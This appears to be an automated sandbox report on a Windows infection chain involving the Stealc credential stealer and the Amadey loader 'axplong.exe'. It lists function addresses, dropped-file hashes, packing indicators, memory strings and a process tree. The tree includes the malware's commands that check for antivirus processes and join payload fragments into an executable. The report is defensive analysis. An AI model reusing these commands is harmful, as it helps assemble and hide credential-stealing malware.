Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C89EA80	17_2_6C89EA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8CEA00	17_2_6C8CEA00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D8A30	17_2_6C8D8A30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C89CA70	17_2_6C89CA70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8C0BA0	17_2_6C8C0BA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C926BE0	17_2_6C926BE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C94A480	17_2_6C94A480
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8664D0	17_2_6C8664D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8BA4D0	17_2_6C8BA4D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C884420	17_2_6C884420
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8AA430	17_2_6C8AA430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C838460	17_2_6C838460
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8145B0	17_2_6C8145B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8EA5E0	17_2_6C8EA5E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8AE5F0	17_2_6C8AE5F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C968550	17_2_6C968550
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C878540	17_2_6C878540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C924540	17_2_6C924540
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C882560	17_2_6C882560
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8C0570	17_2_6C8C0570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8446D0	17_2_6C8446D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C87E6E0	17_2_6C87E6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8BE6E0	17_2_6C8BE6E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C87C650	17_2_6C87C650
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C84A7D0	17_2_6C84A7D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8A0700	17_2_6C8A0700
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C818090	17_2_6C818090
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8300B0	17_2_6C8300B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FC0B0	17_2_6C8FC0B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8EC000	17_2_6C8EC000
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8E8010	17_2_6C8E8010
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C86E070	17_2_6C86E070
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8201E0	17_2_6C8201E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C904130	17_2_6C904130
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C896130	17_2_6C896130
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C888140	17_2_6C888140
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8F22A0	17_2_6C8F22A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8EE2B0	17_2_6C8EE2B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9A62C0	17_2_6C9A62C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8EA210	17_2_6C8EA210
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8F8220	17_2_6C8F8220
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B8250	17_2_6C8B8250
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8A8260	17_2_6C8A8260
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8523A0	17_2_6C8523A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C87E3B0	17_2_6C87E3B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8743E0	17_2_6C8743E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C892320	17_2_6C892320
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C828340	17_2_6C828340
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C962370	17_2_6C962370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C822370	17_2_6C822370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C93C360	17_2_6C93C360
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B6370	17_2_6C8B6370
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C95DCD0	17_2_6C95DCD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8E1CE0	17_2_6C8E1CE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C831C30	17_2_6C831C30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C823C40	17_2_6C823C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C949C40	17_2_6C949C40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C813D80	17_2_6C813D80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C969D90	17_2_6C969D90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8F1DC0	17_2_6C8F1DC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C883D00	17_2_6C883D00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C843EC0	17_2_6C843EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C92DE10	17_2_6C92DE10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C97BE70	17_2_6C97BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9A5E60	17_2_6C9A5E60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C841F90	17_2_6C841F90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C93DFC0	17_2_6C93DFC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9A3FC0	17_2_6C9A3FC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8CBFF0	17_2_6C8CBFF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C855F20	17_2_6C855F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C815F30	17_2_6C815F30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C977F20	17_2_6C977F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C82D8E0	17_2_6C82D8E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8538E0	17_2_6C8538E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C97B8F0	17_2_6C97B8F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FF8F0	17_2_6C8FF8F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C87D810	17_2_6C87D810
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C831980	17_2_6C831980
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8F1990	17_2_6C8F1990
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B99C0	17_2_6C8B99C0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8599D0	17_2_6C8599D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8859F0	17_2_6C8859F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B79F0	17_2_6C8B79F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C96F900	17_2_6C96F900
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8D5920	17_2_6C8D5920
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C89F960	17_2_6C89F960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8DD960	17_2_6C8DD960
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FDAB0	17_2_6C8FDAB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C821AE0	17_2_6C821AE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C85FA10	17_2_6C85FA10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C91DA30	17_2_6C91DA30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9A9A50	17_2_6C9A9A50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C905B90	17_2_6C905B90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C811B80	17_2_6C811B80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C879BA0	17_2_6C879BA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8E9BB0	17_2_6C8E9BB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C867BF0	17_2_6C867BF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C86BB20	17_2_6C86BB20

Source: Joe Sandbox View	Dropped File: C:\ProgramData\LgAmARwZ\Application.exe 8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 007745C0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C849B10 appears 92 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C959F30 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C87C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: String function: 6C843620 appears 91 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: random[1].exe0.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: f55899dae2.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Application.exe.33.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973443886239782
Source: file.exe	Static PE information: Section: mahfbdtk ZLIB complexity 0.9942348008385744
Source: axplong.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9973443886239782
Source: axplong.exe.6.dr	Static PE information: Section: mahfbdtk ZLIB complexity 0.9942348008385744
Source: random[2].exe.13.dr	Static PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
Source: c8908bf20d.exe.13.dr	Static PE information: Section: cbbjugzk ZLIB complexity 0.9947032003238927
Source: random[1].exe.13.dr	Static PE information: Section: ZLIB complexity 0.9981081014890282
Source: 2dc588f7b5.exe.13.dr	Static PE information: Section: ZLIB complexity 0.9981081014890282
Source: random[1].exe1.13.dr	Static PE information: Section: ZLIB complexity 0.9982611677115988
Source: 550b7cfe5f.exe.13.dr	Static PE information: Section: ZLIB complexity 0.9982611677115988
Source: GOLD1234[1].exe.13.dr	Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: GOLD1234.exe.13.dr	Static PE information: Section: .call ZLIB complexity 1.0003314936926606
Source: shop[1].exe.13.dr	Static PE information: Section: .bss ZLIB complexity 1.0003314936926606
Source: shop.exe.13.dr	Static PE information: Section: .bss ZLIB complexity 1.0003314936926606
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: Section: ZLIB complexity 0.9982012091280654
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: Section: edfilslq ZLIB complexity 0.9943063624437781

Source: 550b7cfe5f.exe.13.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: random[1].exe1.13.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@93/82@0/13

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_6C880300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

17_2_6C880300

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00789600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

17_2_00789600

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 17_2_00783720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

17_2_00783720

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7212:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3824:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user~1\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: chrome.exe, 0000002B.00000002.2761183199.00002B3C00647000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: stealc_default2.exe, stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2209459567.000000006C9AF000.00000002.00000001.01000000.0000000D.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: stealc_default2.exe, 00000011.00000003.1991864231.0000000021219000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000003.2002738966.0000000000DD5000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000003.2002297977.0000000021234000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177217810.0000000003E1A000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2208966431.0000000003E06000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2209594821.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2179336471.0000000003DFC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2346026988.00000000057E7000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2377327130.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2461754759.0000000005855000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: stealc_default2.exe, 00000011.00000002.2208137759.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe	ReversingLabs: Detection: 50%
Source: file.exe	Virustotal: Detection: 47%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown	Process created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user~1\AppData\Local\Temp\1000066001\stealc_default2.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user~1\AppData\Local\Temp\1000477001\Offnewhere.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user~1\AppData\Local\Temp\1000817001\splwow64.exe"
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user~1\AppData\Local\Temp\1000828001\new_v8.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
